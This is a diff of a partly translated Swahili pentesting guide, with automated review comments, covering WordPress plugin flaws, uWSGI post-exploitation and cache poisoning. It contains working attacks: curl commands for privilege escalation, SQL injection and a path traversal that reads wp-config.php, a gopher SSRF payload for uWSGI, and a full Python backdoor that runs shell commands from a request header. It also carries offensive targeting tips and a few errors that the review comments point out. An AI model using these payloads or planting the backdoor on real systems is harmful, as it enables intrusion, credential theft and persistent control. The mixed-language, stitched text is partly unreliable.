Mfano wa ulimwengu halisi ulipatikana kwenye plugin Admin and Site Enhancements (ASE) (≤ 7.6.2.1). Tawi la reset liliirejesha role kulingana na `reset-for=<username>` ikiwa jina la mtumiaji liligundika kwenye array ya ndani `$options['viewing_admin_as_role_are']`, lakini halikufanya ukaguzi wa `current_user_can()` wala uthibitisho wa nonce kabla ya kuondoa role za sasa na kuziweka tena role zilizohifadhiwa kutoka user meta `_asenha_view_admin_as_original_roles`:
```php
// Simplified vulnerable pattern
if ( isset( $_REQUEST['reset-for'] ) ) {
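Review bot: the new heading `Kuongezeka kwa ruhusa kupitia urejeshaji wa role zilizo zamani` is ungrammatical for "stale role restoration"; `role zilizopitwa na wakati` (or `zilizochakaa`, which this same commit uses later in `ruhusa za juu zilizochakaa`) reads correctly and keeps the term consistent. In the ASE paragraph, `liligundika` is not a standard form; `lilipatikana kwenye array` or `lilikuwepo katika array` is what is meant.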
@ -513,17 +513,17 @@ foreach ( $orig as $r ) { $u->add_role( $r ); }
```
Kwa nini inaweza kutumiwa
- Inaamini `$_REQUEST['reset-for']` na chaguo la plugin bila idhini upande wa seva.
- Ikiwa mtumiaji hapo awali alikuwa na ruhusa za juu zilizohifadhiwa katika `_asenha_view_admin_as_original_roles` na alipopunguzwa, anaweza kuzirejesha kwa kutembelea njia ya kuweka upya.
- Katika baadhi ya utolewaji, mtumiaji yeyote aliyethibitishwa anaweza kusababisha kuweka upya kwa jina la mtumiaji mwingine ambalo bado lipo katika `viewing_admin_as_role_are` (idhinishaji limevunjika).
- Inatumaini `$_REQUEST['reset-for']` na chaguo la plugin bila idhinisho upande wa server.
- Iwapo mtumiaji awali alikuwa na vibali vya juu vilivyohifadhiwa katika `_asenha_view_admin_as_original_roles` na alishushwa hadhi, anaweza kuvirudisha kwa kufikia njia ya reset.
- Katika baadhi ya mifumo, mtumiaji yeyote aliyethibitishwa anaweza kusababisha reset kwa jina la mtumiaji mwingine linaloendelea kuwepo katika `viewing_admin_as_role_are` (idhinishaji lililoharibika).
Masharti ya shambulio
Mahitaji ya shambulio
- Toleo la plugin lenye udhaifu na kipengele kimewezeshwa.
- Akaunti lengwa ina jukumu la juu lisilotumika lililohifadhiwa katika user meta kutokana na matumizi ya awali.
- Kikao chochote kilichothibitishwa; hakuna nonce/capability katika mtiririko wa reset.
- Akaunti lengwa ina role ya juu iliyosalia iliyohifadhiwa katika user meta kutoka matumizi ya awali.
- Kikao chochote kilicho thibitishwa; kutokuwepo kwa nonce/capability kwenye mtiririko wa reset.
Utekelezaji (mfano)
Exploitation (example)
```bash
# While logged in as the downgraded user (or any auth user able to trigger the code path),
# hit any route that executes the role-switcher logic and include the reset parameter.
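Review bot: `Exploitation (example)` replaces the already translated `Utekelezaji (mfano)` with English, which works against the purpose of this commit and is inconsistent with the Swahili `Kwa nini inaweza kutumiwa` and `Mahitaji ya shambulio` headings in the same hunk; keep `Utekelezaji (mfano)`. Also `Inatumaini $_REQUEST['reset-for']` means "hopes for / relies on" rather than "trusts"; the replaced `Inaamini` was the right verb.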
@ -531,36 +531,36 @@ Utekelezaji (mfano)
curl -s -k -b 'wordpress_logged_in=...' \
'https://victim.example/wp-admin/?reset-for=<your_username>'
```
Kwenye builds zilizo hatarini hili hufuta roles za sasa na kurejesha roles za awali zilizohifadhiwa (mfano, `administrator`), kwa ufanisi ikiongeza mamlaka.
Kwenye builds zilizo hatarini hili huondoa roles za sasa na kuzirudisha roles za asili zilizohifadhiwa (kwa mfano, `administrator`), kwa ufanisi kuongeza ruhusa.
Detection checklist
- Tafuta vipengele vya kubadili roles vinavyohifadhi “original roles” katika user meta (mfano, `_asenha_view_admin_as_original_roles`).
- Angalia vipengele vya kubadilisha role ambavyo vinahifadhi “original roles” katika user meta (mf., `_asenha_view_admin_as_original_roles`).
- Tambua njia za reset/restore ambazo:
- Soma majina ya watumiaji kutoka `$_REQUEST` / `$_GET` / `$_POST`.
- Badilisha roles kupitia `add_role()` / `remove_role()` bila `current_user_can()` na `wp_verify_nonce()` / `check_admin_referer()`.
- Ruhusu kwa kuzingatia array ya chaguo la plugin (mfano, `viewing_admin_as_role_are`) badala ya uwezo wa mhusika.
- Kusoma majina ya watumiaji kutoka `$_REQUEST` / `$_GET` / `$_POST`.
- Kubadilisha roles kupitia `add_role()` / `remove_role()` bila `current_user_can()` na `wp_verify_nonce()` / `check_admin_referer()`.
- Kuidhinishwa kwa msingi wa array ya chaguo la plugin (mf., `viewing_admin_as_role_are`) badala ya uwezo wa mhusika.
Hardening
- Tekeleza ukaguzi wa uwezo kwenye kila tawi linalobadilisha hali (mfano, `current_user_can('manage_options')` au ngumu zaidi).
- Lazimisha nonces kwa mabadiliko yote ya role/idhini na uyathibitishe: `check_admin_referer()` / `wp_verify_nonce()`.
- Usiwamini kamwe majina ya watumiaji yanayotolewa na request; tafuta mtumiaji lengwa upande wa server kulingana na mwendeshaji aliye thibitishwa na sera wazi.
- Futa hali ya “original roles” kwenye masasisho ya wasifu/role ili kuepuka kurejeshwa kwa ruhusa za juu zilizokuwa za zamani:
- Lazimisha ukaguzi wa uwezo kwenye kila tawi linalobadilisha hali (mf., `current_user_can('manage_options')` au kali zaidi).
- Lazimisha nonces kwa mabadiliko yote ya role/permission na uyathibitishe: `check_admin_referer()` / `wp_verify_nonce()`.
- Usiwamini kamwe majina ya watumiaji yanayotolewa kupitia request; tatua mtumiaji lengwa upande wa server kulingana na mhusika aliyethibitishwa na sera wazi.
- Batilisha hali ya “original roles” wakati wa masasisho ya profile/role ili kuepuka urejeshaji wa ruhusa za juu zilizochakaa:
```php
add_action( 'profile_update', function( $user_id ) {
delete_user_meta( $user_id, '_asenha_view_admin_as_original_roles' );
}, 10, 1 );
```
- Fikiria kuhifadhi hali ndogo tu na kutumia tokens zenye muda wa uhalali, zilizo na ulinzi wa capability kwa ajili ya kubadilisha role kwa muda.
- Fikiria kuhifadhi minimal state na kutumia time-limited, capability-guarded tokens kwa temporary role switches.
---
### Kuongezeka kwa mamlaka bila uthibitisho kupitia cookietrusted user switching kwenye public `init` (Service Finder “sf-booking”)
### Unauthenticated privilege escalation via cookietrusted user switching on public init (Service Finder “sf-booking”)
Plugins fulani huunganisha user-switching helpers kwenye public `init` hook na huchota utambulisho kutoka kwa cookie inayodhibitiwa na mteja. Ikiwa code inaita `wp_set_auth_cookie()` bila kuthibitisha authentication, capability na nonce halali, mgeni yeyote asiyethibitishwa anaweza kulazimisha kuingia kama user ID yoyote.
Baadhi ya plugins huunganisha user-switching helpers kwenye public `init` hook na hupata utambulisho kutoka kwa client-controlled cookie. Ikiwa code inapiga simu `wp_set_auth_cookie()` bila kuthibitisha authentication, capability na nonce halali, mgeni yeyote asiye na uthibitisho anaweza kulazimisha login kama user ID yoyote.
Mfano wa kawaida wenye hatari (umerahisishwa kutoka Service Finder Bookings ≤ 6.1):
Typical vulnerable pattern (simplified from Service Finder Bookings ≤ 6.1):
```php
function service_finder_submit_user_form(){
if ( isset($_GET['switch_user']) && is_numeric($_GET['switch_user']) ) {
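Review bot: the section heading and the `Typical vulnerable pattern (simplified from Service Finder Bookings ≤ 6.1):` line are reverted to English in this hunk, and the new heading also drops the inline-code formatting around `init` that the replaced heading had; keep the Swahili heading and the backticks. In the explanatory paragraph, `Ikiwa code inapiga simu wp_set_auth_cookie()` is a calque ("makes a phone call"); `inaita wp_set_auth_cookie()` is the verb for a function call. The last hardening bullet `Fikiria kuhifadhi minimal state na kutumia time-limited, capability-guarded tokens kwa temporary role switches.` is mostly English; the replaced `Fikiria kuhifadhi hali ndogo tu na kutumia tokens zenye muda wa uhalali, zilizo na ulinzi wa capability ...` was the better translation.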
@ -589,13 +589,13 @@ wp_die('Original user not found.');
wp_die('No original user found to switch back to.');
}
```
Kwa nini inaweza kutumika
Kwa nini inaweza kutumiwa
- Hook ya umma ya `init` inafanya mshughulikiaji kupatikana kwa watumiaji wasiothibitishwa (hakuna `is_user_logged_in()` guard).
- Utambulisho umetokana na cookie inayoweza kubadilishwa na mteja (`original_user_id`).
- Kiito cha moja kwa moja cha `wp_set_auth_cookie($uid)` kinaingia muombaji kama mtumiaji huyo bila ukaguzi wowote wa capability/nonce.
- Hook ya umma ya `init` inafanya handler kupatikana kwa unauthenticated users (hakuna `is_user_logged_in()` guard).
- Utambulisho unatokana na cookie inayoweza kubadilishwa na client (`original_user_id`).
- Mwito wa moja kwa moja wa `wp_set_auth_cookie($uid)` unaingia muombaji kama mtumiaji huyo bila ukaguzi wowote wa capability/nonce checks.
Utekelezaji (bila kuidhinishwa)
Exploitation (unauthenticated)
```http
GET /?switch_back=1 HTTP/1.1
Host: victim.example
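Review bot: `Exploitation (unauthenticated)` replaces the translated `Utekelezaji (bila kuidhinishwa)` with English, inconsistent with the Swahili `Kwa nini inaweza kutumiwa` heading kept just above; keep the Swahili one. In the third bullet, `bila ukaguzi wowote wa capability/nonce checks` says "checks" twice (`ukaguzi` already means checks); drop the trailing `checks`.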
@ -605,32 +605,32 @@ Connection: close
```
---
### Mambo ya kuzingatia ya WAF kwa WordPress/plugin CVEs
### Mambo ya WAF kwa WordPress/plugin CVEs
WAF za generic za edge/server zimepangwa kwa mifumo pana (SQLi, XSS, LFI). Mapungufu mengi yenye athari kubwa katika WordPress/plugin ni mende za logic/auth maalum za programu ambazo huonekana kama trafiki isiyo hatari isipokuwa engine itakapoelewa routes za WordPress na semantics za plugin.
WAFs za edge/server zimetengenezwa kwa ajili ya mifumo mpana (SQLi, XSS, LFI). Makosa mengi yenye athari kubwa kwenye WordPress/plugin ni hitilafu za mantiki/uthibitisho ndani ya application ambazo zinaonekana kama trafiki isiyo hatari isipokuwa engine itakayofahamu WordPress routes na plugin semantics.
Offensive notes
Vidokezo vya Ofensi
- Lenga endpoints maalum za plugin kwa payloads safi: `admin-ajax.php?action=...`, `wp-json/<namespace>/<route>`, custom file handlers, shortcodes.
- Fanya kwanza njia zisizo na uthibitisho (AJAX `nopriv`, REST with permissive `permission_callback`, public shortcodes). Default payloads mara nyingi hufanikiwa bila obfuscation.
- Lenga endpoints maalum za plugin na payloads safi: `admin-ajax.php?action=...`, `wp-json/<namespace>/<route>`, custom file handlers, shortcodes.
- Chunguza njia zisizo za uthibitisho kwanza (AJAX `nopriv`, REST with permissive `permission_callback`, public shortcodes). Default payloads mara nyingi zinafanikiwa bila obfuscation.
- Mifano ya kawaida yenye athari kubwa: privilege escalation (broken access control), arbitrary file upload/download, LFI, open redirect.
Defensive notes
Vidokezo vya Ulinzi
- Usitegemee saini za generic za WAF kulinda plugin CVEs. Tekeleza virtual patches maalum kwenye application-layer au sasisha haraka.
- Tumia positive-security checks katika code (capabilities, nonces, strict input validation) badala ya negative regex filters.
- Usitegemee saini za WAF za jumla kulinda plugin CVEs. Tekeleza virtual patches za application-layer zinazolenga udhaifu maalum au sasisha haraka.
- Pendelea positive-security checks ndani ya code (capabilities, nonces, strict input validation) badala ya negative regex filters.
## Ulinzi wa WordPress
### Sasisho za kawaida
### Sasisho za Mara kwa Mara
Hakikisha WordPress, plugins, na themes zimeboreshwa hadi toleo jipya. Pia thibitisha kuwa automated updating imewezeshwa katika wp-config.php:
Hakikisha WordPress, plugins, na themes ziko kwenye toleo la sasa. Pia thibitisha kwamba automated updating imewezeshwa katika wp-config.php:
```bash
define( 'WP_AUTO_UPDATE_CORE', true );
add_filter( 'auto_update_plugin', '__return_true' );
add_filter( 'auto_update_theme', '__return_true' );
```
Pia, **weka tu plugins na themes za WordPress za kuaminika**.
Pia, **weka tu WordPress plugins na themes zinazoweza kuaminika**.
### Plugins za Usalama
@ -638,18 +638,18 @@ Pia, **weka tu plugins na themes za WordPress za kuaminika**.
- [**Sucuri Security**](https://wordpress.org/plugins/sucuri-scanner/)
- [**iThemes Security**](https://wordpress.org/plugins/better-wp-security/)
### **Mapendekezo mengine**
### **Mapendekezo Mengine**
- Ondoa mtumiaji wa chaguo-msingi **admin**
- Ondoa mtumiaji chaguo-msingi **admin**
- Tumia **nywila zenye nguvu** na **2FA**
- Mara kwa mara **kagua** ruhusa za watumiaji
- **Punguza idadi ya jaribio la kuingia** ili kuzuia mashambulizi ya Brute Force
- Badilisha jina la faili **`wp-admin.php`** na ruhusu ufikiaji ndani tu au kutoka kwa anwani za IP maalum.
- Kila mara **kagua** **ruhusa** za watumiaji
- **Punguza idadi ya jaribio za kuingia** ili kuzuia Brute Force attacks
- Badilisha jina la faili **`wp-admin.php`** na ruhusu ufikiaji tu ndani au kutoka anwani za IP maalum.
### SQL Injection bila uthibitisho kupitia uhakiki usio wa kutosha (WP Job Portal <= 2.3.2)
### Unauthenticated SQL Injection kutokana na ukosefu wa uthibitishaji (WP Job Portal <= 2.3.2)
Plugin ya uajiri ya WP Job Portal ilifunua kazi ya **savecategory** ambayo hatimaye inatekeleza msimbo wenye udhaifu ufuatao ndani ya `modules/category/model.php::validateFormData()`:
The WP Job Portal recruitment plugin exposed a **savecategory** task that ultimately executes the following vulnerable code inside `modules/category/model.php::validateFormData()`:
```php
$category = WPJOBPORTALrequest::getVar('parentid');
$inquery = ' ';
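Review bot: the replacement line "The WP Job Portal recruitment plugin exposed a **savecategory** task that ultimately executes ..." drops the Swahili translation and reverts to English, which is a regression for a translation commit; keep "Plugin ya uajiri ya WP Job Portal ilifunua kazi ya **savecategory** ...". Two smaller points in the recommendations list: "Kila mara **kagua** **ruhusa** za watumiaji" changes the meaning from "Mara kwa mara" (regularly) to "always", and both versions of the last bullet name a file **`wp-admin.php`**, which does not exist in WordPress; wp-admin is a directory and the login entry point is wp-login.php, so the recommendation should name those instead.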
@ -659,19 +659,19 @@ $inquery .= " WHERE parentid = $category "; // <-- direct concat ✗
$query = "SELECT max(ordering)+1 AS maxordering FROM "
. wpjobportal::$_db->prefix . "wj_portal_categories " . $inquery; // executed later
```
Masuala yaliyoletwa na kipande hiki:
Issues introduced by this snippet:
1. **Ingizo la mtumiaji lisilosafishwa** `parentid` linatokana moja kwa moja na ombi la HTTP.
2. **Ujunganishaji wa string ndani ya WHERE clause** hakuna matumizi ya `is_numeric()` / `esc_sql()` au prepared statement.
3. **Upatikanaji bila uthibitisho** ingawa kitendo kinatekelezwa kupitia `admin-post.php`, ukaguzi pekee uliopo ni **CSRF nonce** (`wp_verify_nonce()`), ambao mtembeleaji yeyote anaweza kuupata kutoka kwenye ukurasa wa umma unaojumuisha shortcode `[wpjobportal_my_resumes]`.
1. **Ingizo la mtumiaji lisilosafishwa** `parentid` linaingia moja kwa moja kutoka HTTP request.
2. **String concatenation inside the WHERE clause** hakuna `is_numeric()` / `esc_sql()` / prepared statement.
3. **Unauthenticated reachability** ingawa action inatekelezwa kupitia `admin-post.php`, ukaguzi wa pekee uliopo ni **CSRF nonce** (`wp_verify_nonce()`), ambao mtumiaji yeyote anaweza kuupata kutoka ukurasa wa umma unaoingiza shortcode `[wpjobportal_my_resumes]`.
#### Utekelezwaji
#### Utekelezaji
1. Pata nonce mpya:
```bash
curl -s https://victim.com/my-resumes/ | grep -oE 'name="_wpnonce" value="[a-f0-9]+' | cut -d'"' -f4
```
2. Ingiza SQL ya hiari kwa kuutumia vibaya `parentid`:
2. Inject arbitrary SQL by abusing `parentid`:
```bash
curl -X POST https://victim.com/wp-admin/admin-post.php \
-d 'task=savecategory' \
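Review bot: several replacement lines in this hunk revert to English or mix both languages, e.g. "Issues introduced by this snippet:", "2. **String concatenation inside the WHERE clause** hakuna `is_numeric()` ..." and "2. Inject arbitrary SQL by abusing `parentid`:", where the lines they replace were fully Swahili; keep the Swahili wording. Item 2 also only hints at the remedy: since `$category` comes from `getVar('parentid')` and is an integer id, the fix to recommend is WordPress's `$wpdb->prepare()` with a `%d` placeholder (or an explicit `(int)` cast) in place of the `" WHERE parentid = $category "` concatenation shown.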
@ -679,18 +679,18 @@ curl -X POST https://victim.com/wp-admin/admin-post.php \
-d 'parentid=0 OR 1=1-- -' \
-d 'cat_title=pwn' -d 'id='
```
Majibu yanafunua matokeo ya query iliyowekwa au yanabadilisha database, kuthibitisha SQLi.
The response discloses the result of the injected query or alters the database, proving SQLi.
### Unauthenticated Arbitrary File Download / Path Traversal (WP Job Portal <= 2.3.2)
### Kupakua Faili Bila Uthibitisho / Path Traversal (WP Job Portal <= 2.3.2)
Kazi nyingine, **downloadcustomfile**, iliwaruhusu wageni kupakua **faili yoyote kwenye diski** kwa kupitia path traversal. Sink iliyo hatarishi iko katika `modules/customfield/model.php::downloadCustomUploadedFile()`:
Another task, **downloadcustomfile**, allowed visitors to download **any file on disk** via path traversal. The vulnerable sink is located in `modules/customfield/model.php::downloadCustomUploadedFile()`:
```php
$file = $path . '/' . $file_name;
...
echo $wp_filesystem->get_contents($file); // raw file output
```
`$file_name` ni attacker-controlled na imeunganishwa **bila kusafishwa**. Tena, kizuizi pekee ni **CSRF nonce** ambayo inaweza kupatikana kwenye ukurasa wa resume.
`$file_name` inadhibitiwa na mshambuliaji na imeunganishwa **bila kusafishwa**. Mara nyingine tena, kizuizi pekee ni **CSRF nonce** ambayo inaweza kupatikana kutoka kwenye ukurasa wa resume.
#### Exploitation
```bash
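Review bot: the sink `$file = $path . '/' . $file_name;` is correctly described as unsanitized, but the section never says what the fix looks like; the remediation to state is rejecting any `$file_name` that contains a path separator (e.g. via `basename()`) and checking with `realpath()` that the result still lies under `$path` before `$wp_filesystem->get_contents($file)` runs. Separately, "The response discloses the result of the injected query ..." and "Another task, **downloadcustomfile**, allowed visitors to download ..." replace Swahili lines with untranslated English; keep "Majibu yanafunua matokeo ya query ..." and "Kazi nyingine, **downloadcustomfile**, iliwaruhusu wageni ...".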
@ -701,9 +701,9 @@ curl -G https://victim.com/wp-admin/admin-post.php \
--data-urlencode 'entity_id=1' \
--data-urlencode 'file_name=../../../wp-config.php'
```
Seva inajibu na yaliyomo ya `wp-config.php`, leaking DB credentials and auth keys.
Seva inarudisha yaliyomo ya `wp-config.php`, leaking DB credentials and auth keys.
## Marejeleo
## Marejeo
- [Unauthenticated Arbitrary File Deletion Vulnerability in Litho Theme](https://patchstack.com/articles/unauthenticated-arbitrary-file-delete-vulnerability-in-litho-the/)
- [Multiple Critical Vulnerabilities Patched in WP Job Portal Plugin](https://patchstack.com/articles/multiple-critical-vulnerabilities-patched-in-wp-job-portal-plugin/)
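Review bot: both the old and the new sentence after the curl example are only half translated: "Seva inarudisha yaliyomo ya `wp-config.php`, leaking DB credentials and auth keys." switches to English mid-sentence, so the commit keeps the defect it touches; finish the translation (e.g. "..., ikivujisha DB credentials na auth keys").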

View File

@ -0,0 +1,169 @@
# WSGI Post-Exploitation Tricks
{{#include ../../banners/hacktricks-training.md}}
## Muhtasari wa WSGI
Web Server Gateway Interface (WSGI) ni spesifikesheni inayoelezea jinsi web server inavyowasiliana na web applications, na jinsi web applications zinaweza kuunganishwa pamoja ili kuchakata request moja. uWSGI ni mojawapo ya servers maarufu za WSGI, mara nyingi ikitumika kuhudumia Python web applications.
## uWSGI Magic Variables Exploitation
uWSGI hutoa vigezo maalum vinavyoitwa "magic variables" vinavyoweza kutumika kusanidi mienendo ya server kwa njia ya dynamic. Vigezo hivi vinaweza kuwekwa kupitia HTTP headers na vinaweza kusababisha udhaifu mkubwa wa usalama ikiwa havitathminiwa ipasavyo.
### Key Exploitable Variables
#### `UWSGI_FILE` - Utekelezaji wa faili yoyote
```
uwsgi_param UWSGI_FILE /path/to/python/file.py;
```
Kigezo hiki kinaruhusu kupakia na kutekeleza faili zozote za Python kama maombi ya WSGI. Iwapo mshambulizi anaweza kudhibiti kigezo hiki, anaweza kufanikisha Remote Code Execution (RCE).
#### `UWSGI_SCRIPT` - Kupakia skripti
```
uwsgi_param UWSGI_SCRIPT module.path:callable;
uwsgi_param SCRIPT_NAME /endpoint;
```
Inapakia script iliyobainishwa kama programu mpya. Ikiunganishwa na file upload au write capabilities, hii inaweza kusababisha RCE.
#### `UWSGI_MODULE` and `UWSGI_CALLABLE` - Dynamic Module Loading
```
uwsgi_param UWSGI_MODULE malicious.module;
uwsgi_param UWSGI_CALLABLE evil_function;
uwsgi_param SCRIPT_NAME /backdoor;
```
Vigezo hivi vinaruhusu kupakia modules za Python zozote na kuita functions maalum ndani yao.
#### `UWSGI_SETENV` - Udhibiti wa vigezo vya mazingira
```
uwsgi_param UWSGI_SETENV DJANGO_SETTINGS_MODULE=malicious.settings;
```
Inaweza kutumika kubadilisha environment variables, na hivyo kuathiri application behavior au kupakia malicious configuration.
#### `UWSGI_PYHOME` - Python Environment Manipulation
```
uwsgi_param UWSGI_PYHOME /path/to/malicious/venv;
```
Hubadilisha mazingira ya virtual ya Python, na hivyo inaweza kupakia vifurushi hatarishi au mfasiri tofauti wa Python.
#### `UWSGI_CHDIR` - Directory Traversal
```
uwsgi_param UWSGI_CHDIR /etc/;
```
Inabadilisha saraka ya kazi kabla ya kuchakata maombi, jambo ambalo linaweza kutumika kwa mashambulizi ya path traversal.
## SSRF + Gopher kwa
### Njia ya Mashambulizi
Wakati uWSGI inapatikana kupitia SSRF (Server-Side Request Forgery), wadukuzi wanaweza kuingiliana na socket ya ndani ya uWSGI ili kutumia vigezo maalum (magic variables). Hii ni hatari hasa wakati:
1. Programu ina mianya ya SSRF
2. uWSGI inaendesha kwenye port/socket ya ndani
3. Programu haina kuthibitisha vizuri vigezo maalum (magic variables)
uWSGI inapatikana kutokana na SSRF kwa sababu faili ya config `uwsgi.ini` ina: `socket = 127.0.0.1:5000`, ikifanya ipatikane kutoka kwa web application kupitia SSRF.
### Mfano wa Utekelezaji
#### Hatua 1: Tengeneza Payload Hasidi
Kwanza, weka (inject) code ya Python ndani ya faili inayoweza kufikiwa na seva (kuandika faili ndani ya seva, extension ya faili haina umuhimu):
```python
# Payload injected into a JSON profile file
import os
os.system("/readflag > /app/profiles/result.json")
```
#### Hatua 2: Tengeneza uWSGI Protocol Request
Tumia Gopher protocol kutuma raw uWSGI packets:
```
gopher://127.0.0.1:5000/_%00%D2%00%00%0F%00SERVER_PROTOCOL%08%00HTTP/1.1%0E%00REQUEST_METHOD%03%00GET%09%00PATH_INFO%01%00/%0B%00REQUEST_URI%01%00/%0C%00QUERY_STRING%00%00%0B%00SERVER_NAME%00%00%09%00HTTP_HOST%0E%00127.0.0.1%3A5000%0A%00UWSGI_FILE%1D%00/app/profiles/malicious.json%0B%00SCRIPT_NAME%10%00/malicious.json
```
Payload hii:
- Inaunganisha na uWSGI kwenye port 5000
- Inaweka `UWSGI_FILE` ili kuelekeza kwa faili yenye madhara
- Inalazimisha uWSGI kupakia na kutekeleza msimbo wa Python
### uWSGI Protocol Structure
Protocol ya uWSGI inatumia muundo wa binary ambapo:
- Variables zimeandikwa kwa format inayoweka urefu kabla ya string
- Kila variable ina: `[name_length][name][value_length][value]`
- Paketi huanza na header inayojumuisha jumla ya ukubwa
## Post-Exploitation Techniques
### 1. Persistent Backdoors
#### File-based Backdoor
```python
# backdoor.py
import subprocess
import base64
def application(environ, start_response):
cmd = environ.get('HTTP_X_CMD', '')
if cmd:
result = subprocess.run(base64.b64decode(cmd), shell=True, capture_output=True, text=True)
response = f"STDOUT: {result.stdout}\nSTDERR: {result.stderr}"
else:
response = "Backdoor active"
start_response('200 OK', [('Content-Type', 'text/plain')])
return [response.encode()]
```
Kisha tumia `UWSGI_FILE` ili kupakia backdoor hii:
```
uwsgi_param UWSGI_FILE /tmp/backdoor.py;
uwsgi_param SCRIPT_NAME /admin;
```
#### Udumu Kulingana na Mazingira
```
uwsgi_param UWSGI_SETENV PYTHONPATH=/tmp/malicious:/usr/lib/python3.8/site-packages;
```
### 2. Ufichaji wa Taarifa
#### Environment Variable Dumping
```python
# env_dump.py
import os
import json
def application(environ, start_response):
env_data = {
'os_environ': dict(os.environ),
'wsgi_environ': dict(environ)
}
start_response('200 OK', [('Content-Type', 'application/json')])
return [json.dumps(env_data, indent=2).encode()]
```
#### Ufikiaji wa Mfumo wa Faili
Tumia `UWSGI_CHDIR` pamoja na file serving ili kufikia faili nyeti:
```
uwsgi_param UWSGI_CHDIR /etc/;
uwsgi_param UWSGI_FILE /app/file_server.py;
```
### 3. Privilege Escalation
#### Socket Manipulation
Ikiwa uWSGI inaendesha kwa ruhusa zilizoinuliwa, washambuliaji wanaweza kubadilisha ruhusa za soketi:
```
uwsgi_param UWSGI_CHDIR /tmp;
uwsgi_param UWSGI_SETENV UWSGI_SOCKET_OWNER=www-data;
```
#### Kufunika Mipangilio
```python
# malicious_config.py
import os
# Override uWSGI configuration
os.environ['UWSGI_MASTER'] = '1'
os.environ['UWSGI_PROCESSES'] = '1'
os.environ['UWSGI_CHEAPER'] = '1'
```
## Marejeo
- [uWSGI Magic Variables Documentation](https://uwsgi-docs.readthedocs.io/en/latest/Vars.html)
- [IOI SaveData CTF Writeup](https://bugculture.io/writeups/web/ioi-savedata)
- [uWSGI Security Best Practices](https://uwsgi-docs.readthedocs.io/en/latest/Security.html)
{{#include ../../banners/hacktricks-training.md}}
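Review bot: the heading "## SSRF + Gopher kwa" is cut off; "kwa" dangles without an object, and the section is about reaching the local uWSGI socket, so it should read "## SSRF + Gopher kwa uWSGI" or similar. Headings in this new file are also translated inconsistently ("#### `UWSGI_FILE` - Utekelezaji wa faili yoyote" in Swahili, but "#### `UWSGI_MODULE` and `UWSGI_CALLABLE` - Dynamic Module Loading", "### 1. Persistent Backdoors" and "#### Socket Manipulation" left in English). Under "Kufunika Mipangilio", malicious_config.py sets `os.environ['UWSGI_MASTER'] = '1'` from inside an application that uWSGI has already loaded, but uWSGI reads `UWSGI_*` environment variables as options at startup, so this does not reconfigure the running server; either explain what the block is meant to achieve or drop it. The `/app/file_server.py` referenced under "Ufikiaji wa Mfumo wa Faili" is never shown either.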

View File

@ -2,30 +2,30 @@
{{#include ../../banners/hacktricks-training.md}}
## The difference
## Tofauti
> **What is the difference between web cache poisoning and web cache deception?**
> **Nini tofauti kati ya web cache poisoning na web cache deception?**
>
> - In **web cache poisoning**, mshambuliaji husababisha programu kuhifadhi baadhi ya maudhui hatarishi katika cache, na maudhui haya hutolewa kutoka cache kwa watumiaji wengine wa programu.
> - In **web cache deception**, mshambuliaji husababisha programu kuhifadhi maudhui nyeti ya mtumiaji mwingine katika cache, kisha mshambuliaji hurudisha maudhui haya kutoka kwenye cache.
> - Katika **web cache poisoning**, mshambuliaji husababisha application kuweka baadhi ya maudhui hatarishi kwenye cache, na maudhui haya hutolewa kutoka kwenye cache kwa watumiaji wengine wa application.
> - Katika **web cache deception**, mshambuliaji husababisha application kuweka baadhi ya maudhui nyeti ya mtumiaji mwingine kwenye cache, na kisha mshambuliaji anazipata maudhui haya kutoka kwenye cache.
## Cache Poisoning
Cache poisoning inalenga kuingilia cache ya upande wa mteja ili kumlazimisha mteja kupakia rasilimali zisizotarajiwa, zisizokamilika, au zilizo chini ya udhibiti wa mshambuliaji. Ukubwa wa athari unategemea maarufu ya ukurasa uliokumba, kwani majibu yaliyochafu hutolewa kwa watumiaji wanaotembelea ukurasa wakati wa kipindi cha uchafu wa cache pekee.
Cache poisoning inalenga kudanganya client-side cache ili kulazimisha clients kupakia rasilimali zisizotarajiwa, zisizokamilika, au zilizo chini ya udhibiti wa mshambuliaji. Uwezo wa madhara unategemea umaarufu wa ukurasa ulioathiriwa, kwani jibu lililochafuka hutolewa kwa watumiaji wanaotembelea ukurasa wakati wa kipindi cha uchafuzi wa cache.
Utekelezaji wa shambulio la cache poisoning unahusisha hatua kadhaa:
Utekelezaji wa shambulio la cache poisoning unajumuisha hatua kadhaa:
1. **Kuainisha vigezo visivyotumika kama key**: Hii ni vigezo ambavyo, ingawa havihitajiki kwa ombi kuhifadhiwa kwenye cache, vinaweza kubadilisha majibu yanayotolewa na server. Kuainisha vigezo hivi ni muhimu kwa sababu vinaweza kutumiwa kuathiri cache.
2. **Kutumia vigezo visivyo na key**: Baada ya kuainisha vigezo visivyo na key, hatua inayofuata ni kubaini jinsi ya kutumia vibaya vigezo hivi ili kubadilisha majibu ya server kwa njia inayomfaa mshambuliaji.
3. **Kuhakikisha Majibu yaliyochafu yamehifadhiwa kwenye cache**: Hatua ya mwisho ni kuhakikisha kuwa majibu yaliyobadilishwa yamehifadhiwa kwenye cache. Kwa njia hiyo, mtumiaji yeyote anayeingia ukurasa uliokumba wakati cache imechafuka atapokea jibu lililochafuka.
1. **Identification of Unkeyed Inputs**: Hivi ni vigezo ambavyo, ingawa hazihitajiki ili ombi lihifadhiwe kwenye cache, vinaweza kubadilisha jibu linalorejeshwa na server. Kutambua viingilio hivi ni muhimu kwani vinaweza kutumika kutengeneza cache.
2. **Exploitation of the Unkeyed Inputs**: Baada ya kutambua Unkeyed Inputs, hatua inayofuata ni kubaini jinsi ya kuvitumia vigezo hivi kwa njia inayobadilisha jibu la server kwa manufaa ya mshambuliaji.
3. **Ensuring the Poisoned Response is Cached**: Hatua ya mwisho ni kuhakikisha kwamba jibu lililobadilishwa limehifadhiwa kwenye cache. Kwa njia hii, mtumiaji yeyote anayefikia ukurasa ulioathiriwa wakati cache imepoisoned atapokea jibu lililopotoshwa.
### Discovery: Check HTTP headers
Kawaida, wakati jibu lilihifadhiwa kwenye cache kutakuwa na kichwa kinachoonyesha hivyo; unaweza kuangalia ni vichwa gani vinavyostahili kuzingatiwa katika chapisho hili: [**HTTP Cache headers**](../../network-services-pentesting/pentesting-web/special-http-headers.md#cache-headers).
Kwa kawaida, wakati jibu lime**stored in the cache** kutakuwa na **header inayoonyesha hivyo**; unaweza kuangalia ni header zipi unazopaswa kuzingatia katika chapisho hili: [**HTTP Cache headers**](../../network-services-pentesting/pentesting-web/special-http-headers.md#cache-headers).
### Discovery: Caching error codes
